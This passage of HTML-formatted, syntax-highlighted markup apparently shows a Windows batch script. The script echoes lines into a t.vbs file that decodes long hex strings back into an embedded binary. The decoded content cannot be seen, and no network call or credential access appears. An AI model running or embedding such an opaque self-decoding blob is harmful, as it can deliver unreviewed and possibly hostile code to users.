-moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"AFCE0E7504DA6DF6AB6B833AA01059EA573708756DCAF13FCB23BBDDFBBD23B8A642CA"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8764845405C90E691BA4ED909E86B407523BA4E390D65510B212521EA45448BF827423"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A4C9F84133487D7710F229A483905E83F42748BF83741F241BA4DB201542CA80340752"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"28A4817242CE418A817403A48390FE0AE97148DB21D92195419242CA2E17F13E0C73EB"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"85740ED2F132B16E2A5CE7424A87742BA4D59002BCF79E83EB16483BBC6546FCA21AE9"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"079A7F0AA91DD20B901E83F420A4BB2155435A0D6929A43C48A99016428A8534197905"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E947A0C946987733A47F83F414A41721BD0A693FA4C3908E43EA82F44D8538F6DD9222"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C74AF34666555D4D657D9579F4F7D4486FA0C1CC2CAD70303ABBBDDE4EC857928251E5"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"DF0614D4D6AFABA85D55575B5F792750C85BCEB79BCD303F6F6929BDD7E22DE5D4E207"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E22C812BCC1555F935B5D0EE86C062B696A959B28931AFAC37D55499732D1576F27B1C"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"2BB7BECE515F6B5ECE323696C9D51372026BB1DBCA4D3633D10440C9C0541556D45521"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;Do&lt;/span&gt;&lt;/a&gt; &gt;&gt;t.vbs &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; b=1To 69Step 2:o.Write Chr&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;Clng&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"&amp;amp;H"^&amp;amp;Mid&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt;,b,W^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;:Next&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;In&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A467030ACD1536C0B9A8AEBADEBEA182A9A9AF23A33F0B471E21E5E535F5EBCAABD93A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"0832BE916E306FA8B46D22E473A877AE37331B2A6AEA2AECEB1D844448CA2BCD1B6B80"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"3DEB24E5346325E5AB2B6D383E63B69387A4E2DD4F24E53575350C546D20124979C506"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C77AB139F918603ACC0CEB30233216B31D68F60329AFA8B2B20EA6BCBAAAA601C380F2"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"725B797965FD06FC4622216F89E56AB1745484505E61B395333865FFAFD991C5240B47"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"0584197376F69A9CD5AB6F236B10D74AB38D29B750AAD89345D875E416984F7D1D63AF"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"AFADB6019C00A0536E6D8D6D5D7D85BD2A8F7E06B080E4D6D63BCCC3B5847C40741B6C"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"CC26BF1A45C0729BB96EA4A25BB2B4BEA2CAC0D86BEAD69B483A41E6ADB2D9CC7613F1"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"FFDC9EFFF7F6C8446234DB4B58B37D93B1A296359B3028F3F2156E38806BC84013E8FF"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"6B6B0D35774307FF4FF64D96C0E8B9161850E1CD1501441DE6E13F1359E2CD61ADFFE7"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"FDFE11505407E443D13557E9365602BDD69BC96CA9A1D66CB69137FCEFE6D66FB055D8"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"CDC38D48A414A8B7AA4E243176068203825EC91840292DAEAF626BCDA268E680A60AA4"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"13D69BED5434EB2ACDB9F52C8E40AA518A57D654DE492B0879854A3E6BB79BEB989516"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"3BAC9322A0FB8B7EB57A7B7DA5D9E180EAE574056C7230E60D2B6B3698731C746D408E"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"2C90AEF48986B739217FBE1606C9945E771A241C6729A2B0AA6829CC9CAD80C9FF1400"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"2BDABBC80B25F974A1150328B887149602B36AAA378D6224598EB506BAA0AB6A7088E2"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"0AC79DE4377E6BBC98CAFB6BD25A0763AF35D7A1F4102FD97DC245CA29A5283E140533"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"5931BA0DD0F96EA94F85ACAC1FD62BE4CF543380B4D554014108B91921794980770879"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"82B610B5D373A21E0149236427CD8B1AED4F34BFC22CB6DA2E35D96B18B3177F905689"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"0E56BD8FAE3F8CC800F26459C506A4CE998072503835951B60C4F3A87B6071236FCB41"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"F394D73BAA2D5E4D6684556CB7D7D513522F29AF86FE90FD20B0BCC151E7B4C144996A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"620E72563A987A908C3BC51C5B4B2C620E56D86FA4D5D5B5AC033C9B27A5D5DE1EFE7F"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"F82991FF9AFE769ECF3EA31311443F7CFAAFBFFF6B7FF879311E7C90B99094E2F759B7"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"45899F77DD36B6A544FC4CECB8F50F5CA7FEA971EA274847BE393CB6FEE075EA71D36C"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"F5FDA3EFBFE022E4E540BFEF9AC2487F0B1829079262D0234524236BE386DAE8065127"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"6963121726C4449BEBC0E501A5A18D59B5327F415A4CB48381D557515B5F67D6C66C32"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"3B62B232278666CC5EB0203AB7DEB6C95EB3DEC244CFAD9C175D5C5369AF77D4573350"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"6FB7D5DBA99B11BD6001B6AE7038CC1BD6D56E8A86E1EA1CDA18D65E97EEA8B4983754"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"38166CF0F55B000639BDC2B1616143624C3498829A6AB38331FAE3E60FAAA80AB4750D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"B369626834FC0D4F2165213484A662B54DD43AF5F61C7BA505945225C3DA61161BD352"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;Do&lt;/span&gt;&lt;/a&gt; &gt;&gt;t.vbs &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; b=1To 69Step 2:o.Write Chr&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;Clng&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"&amp;amp;H"^&amp;amp;Mid&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt;,b,W^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;:Next&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;In&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"BD0DEA40FF686386515F68AAA9ABAA773A16A26E7250FBB1106DBAB735BA1ADA18674D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"9D2A096A16213A556647A5BD869A874C6C19BD20BAB2DE566376448363138D9F118E06"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; 